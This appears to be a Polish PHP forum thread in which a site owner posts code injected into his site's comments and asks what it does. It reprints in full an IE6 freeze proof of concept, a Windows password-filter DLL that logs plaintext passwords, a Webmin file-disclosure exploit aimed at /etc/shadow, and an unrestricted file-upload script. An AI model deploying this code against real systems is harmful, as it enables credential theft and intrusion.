Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> HACKERZY? HACK mojej strony !, HELP :(:(
mThW
post
Post #1





Grupa: Zarejestrowani
Postów: 18
Pomógł: 0
Dołączył: 19.07.2006

Ostrzeżenie: (0%)
-----


Witam (IMG:http://forum.php.pl/style_emoticons/default/exclamation.gif) !

Robie strone konkurencyjna dla mojego miasta i jest pare osob zainteresowanych nia!
Ktos proboje cos zrobic, zostaja wklejane kody php na moja strone!!
Oto jeden kod wklejony w systemie newsow w komentarzach:

  1. <!-- 
  2. # Internet Explorer <= 6 DoS vulnerability 
  3. # tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng) 
  4. # all versions are vulnerable 
  5. # ie 7 (beta 2 and 3) are not affected 
  6. # this malicious css code freezes/ dos the internet explorer 
  7. # prior version 7 and stops any user interaction 
  8. # the absolute size of the div element does not matter but has 
  9. # to be higher than the input's one 
  10. # 07/14/2006 by jonasschaub at gmail.com 
  11. # <a href="http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/" target="_blank">http://jonas.elunic.de/blog/index.php/2006.../ie-freeze-bug/</a> 
  12. --> 
  13.  
  14. <style type="text/css"> 
  15.  
  16. input 
  17. width:35px; 
  18. float:left; 
  19.  
  20. </style> 
  21.  
  22. <div style="width:50px;"> 
  23. <span> 
  24. <span style="position:relative;"> 
  25. <input /> 
  26. </span> 
  27. <input /> 
  28. <input /> 
  29. </span> 
  30. </div>
  31.  
  32.  
  33. #include <windows.h> 
  34. #include <stdio.h> 
  35. #include <stdlib.h> 
  36.  
  37. struct UNI_STRING { 
  38. USHORT len; 
  39. USHORT maxlen; 
  40. WCHAR *buff; 
  41. }; 
  42.  
  43. static HANDLE fh; 
  44.  
  45. BOOLEAN __stdcall InitializeChangeNotify () 
  46. DWORD wrote; 
  47. fh = CreateFile("C:temppwdchange.out", 
  48. GENERIC_WRITE, 
  49. FILE_SHARE_READ|FILE_SHARE_WRITE, 
  50. 0, 
  51. CREATE_ALWAYS, 
  52. FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG 
  53. H, 
  54. 0); 
  55. WriteFile(fh, "InitializeChangeNotify startedn", 31, &wrote, 0); 
  56. return TRUE; 
  57.  
  58. LONG __stdcall PasswordChangeNotify ( 
  59. struct UNI_STRING *user, 
  60. ULONG rid, 
  61. struct UNI_STRING *passwd 
  62. DWORD wrote; 
  63. WCHAR wbuf[200]; 
  64. char buf[512]; 
  65. char buf1[200]; 
  66. DWORD len; 
  67.  
  68. memcpy(wbuf, user->buff, user->len); 
  69. len = user->len/sizeof(WCHAR); 
  70. wbuf[len] = 0; 
  71. wcstombs(buf1, wbuf, 199); 
  72. sprintf(buf, "User = %s : ", buf1); 
  73. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  74.  
  75. memcpy(wbuf, passwd->buff, passwd->len); 
  76. len = passwd->len/sizeof(WCHAR); 
  77. wbuf[len] = 0; 
  78. wcstombs(buf1, wbuf, 199); 
  79. sprintf(buf, "Password = %s : ", buf1); 
  80. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  81.  
  82. sprintf(buf, "RID = %xn", rid); 
  83. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  84.  
  85. return 0L; 
  86. -----------------------end of 
  87. FPNWCLNT.c---------------------------------- 
  88. --
  89.  
  90.  
  91.  
  92. <?php 
  93. /* 
  94. Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability 
  95. Date : 2006-06-30 
  96. Patch : update to version 1.290 
  97. Advisory : <a href="http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html" target="_blank">http://securitydot.net/vuln/exploits/vulne...17885/vuln.html</a> 
  98. Coded by joffer , <a href="http://securitydot.net" target="_blank">http://securitydot.net</a> 
  99. */ 
  100.  
  101. $host = $argv[1]; 
  102. $port = $argv[2]; 
  103. $http = $argv[3]; 
  104. $file = $argv[4]; 
  105. // CHECKING THE INPUT 
  106. if($host != "" && $port != "" && $http != "" && $file != "") { 
  107.  
  108.  
  109. $z = "/..%01"; 
  110. for ($i=0;$i<60;$i++) { 
  111. $z.="/..%01"; 
  112. } 
  113.  
  114. $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file.""; 
  115.  
  116. echo "Attacking ".$host."n"; 
  117. echo "---------------------------------n"; 
  118.  
  119. // INITIALIZING CURL SESSION TO THE TARGET 
  120.  
  121. $ch = curl_init(); 
  122.  
  123. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
  124. curl_setopt($ch, CURLOPT_URL, $target); 
  125. curl_setopt ($ch, CURLOPT_TIMEOUT, '10'); 
  126. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE 
  127. ); 
  128.  
  129. $content = curl_exec($ch); 
  130. curl_close ($ch); 
  131.  
  132. // CLOSING CURL 
  133.  
  134. // ECHOING THE CONTENT OF THE $FILE 
  135. echo $content; 
  136.  
  137. echo "---------------------------------n"; 
  138. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  139.  
  140. } else { 
  141. // IF INPUT IS NOT CORRECT DISPLAY THE README 
  142. echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILEn"; 
  143. echo "Example : php webmin.php localhost 10000 http /etc/shadown"; 
  144. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  145. } 
  146.  
  147. ?>
  148.  
  149.  
  150.  
  151. <?php 
  152. $file = $HTTP_POST_FILES["plik"]["tmp_name"]; 
  153. $zapisz_jako = $HTTP_POST_FILES["plik"]["name"]; 
  154.  
  155. if (!copy($file, $zapisz_jako)) { 
  156.  
  157. print ("Kopiowanie pliku nie powiodło się...<br>n"); 
  158.  
  159. } 
  160.  
  161. print "<BR>Nazwa pliku: ".$HTTP_POST_FILES["plik"]["name"]; 
  162.  
  163. print "<BR>Rozmiar pliku: ".$HTTP_POST_FILES["plik"]["size"]; 
  164.  
  165. print "<BR>tymczasowo: ".$HTTP_POST_FILES["plik"]["tmp_name"]; 
  166.  
  167. print "<BR>Typ przesłanego pliku: ".$HTTP_POST_FILES["plik"]["type"]; 
  168.  
  169. ?>



Moaj strona: http://www.miasto-glubczyce.info/index.php...t=&oms=news
Głowna: http://www.miasto-glubczyce.info/
http://www.miasto-glubczyce.info/?oms=ksiega_gosci
W ksiedze tez wpisano jakis kod, dlatego jest error.
HELP (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif)

Co te skrypty znacza? Nie znam php, mam 3 rozne IP z ktorych zostaly wysylane kody, nie wiem czy jest to cos powaznego i czy zawiadamiac odpowiednich ludzi...


Dzieku z gory za analize.
Pozdrawiam
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
marek220
post
Post #2





Grupa: Zarejestrowani
Postów: 46
Pomógł: 0
Dołączył: 14.12.2003
Skąd: Gliwice

Ostrzeżenie: (10%)
X----


Proszę tylko nie crackerzy, to już się przyjeło dla reversowców, pozostawmy crackerów tak jak jest to obecnie rozpoznawane jako osoby piszące keygeny, patche itp, bo zaś dla nich nie będzie nazwy (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 11.10.2025 - 01:43